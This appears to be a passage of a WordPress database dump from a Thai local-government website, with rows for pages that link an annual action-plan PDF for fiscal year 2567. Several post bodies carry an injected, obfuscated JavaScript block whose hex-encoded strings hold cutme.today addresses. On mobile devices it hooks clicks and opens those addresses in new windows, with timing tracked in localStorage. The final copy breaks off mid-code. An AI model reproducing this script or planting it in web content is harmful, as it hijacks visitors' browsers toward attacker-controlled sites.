_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-13 11:37:10','2024-08-13 04:37:10','',14,'http://pakhaeng.ssk.in.th/?p=823',0,'revision','',0),
(824,1,'2024-08-15 09:24:20','2024-08-15 02:24:20','<!-- wp:file {\"id\":1085,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/แผนปฏิบัติการประจำปีงบประมาณ-2567.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/แผนปฏิบัติการประจำปีงบประมาณ-2567.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"แผนปฏิบัติการประจำปีงบประมาณ 2567\"></object><a id=\"wp-block-file--media-f040587d-354c-4d31-9c66-b789810e9aef\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/แผนปฏิบัติการประจำปีงบประมาณ-2567.pdf\">แผนปฏิบัติการประจำปีงบประมาณ 2567</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/แผนปฏิบัติการประจำปีงบประมาณ-2567.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-f040587d-354c-4d31-9c66-b789810e9aef\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี','','publish','closed','closed','','%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%81%e0%b9%89%e0%b8%b2%e0%b8%a7%e0%b8%ab%e0%b8%99%e0%b9%89%e0%b8%b2%e0%b9%83%e0%b8%99%e0%b8%81%e0%b8%b2','','','2024-09-01 21:07:23','2024-09-01 14:07:23','',0,'http://pakhaeng.ssk.in.th/?page_id=824',0,'page','',0),
(825,1,'2024-08-15 09:24:02','2024-08-15 02:24:02','','08 แผนปฏิบัติการประจำปีงบประมาณ 2567','','inherit','','closed','','08-%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%88%e0%b8%b3%e0%b8%9b%e0%b8%b5%e0%b8%87','','','2024-08-15 09:24:02','2024-08-15 02:24:02','',824,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/08-แผนปฏิบัติการประจำปีงบประมาณ-2567.pdf',0,'attachment','application/pdf',0),
(826,1,'2024-08-15 09:24:20','2024-08-15 02:24:20','<!-- wp:file {\"id\":825,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/08-แผนปฏิบัติการประจำปีงบประมาณ-2567.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/08-แผนปฏิบัติการประจำปีงบประมาณ-2567.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"แผนปฏิบัติการประจำปีงบประมาณ 2567\"></object><a id=\"wp-block-file--media-25bb2ef9-b145-42b5-aa1e-87630eb7a20b\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/08-แผนปฏิบัติการประจำปีงบประมาณ-2567.pdf\">แผนปฏิบัติการประจำปีงบประมาณ 2567</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/08-แผนปฏิบัติการประจำปีงบประมาณ-2567.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-25bb2ef9-b145-42b5-aa1e-87630eb7a20b\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else 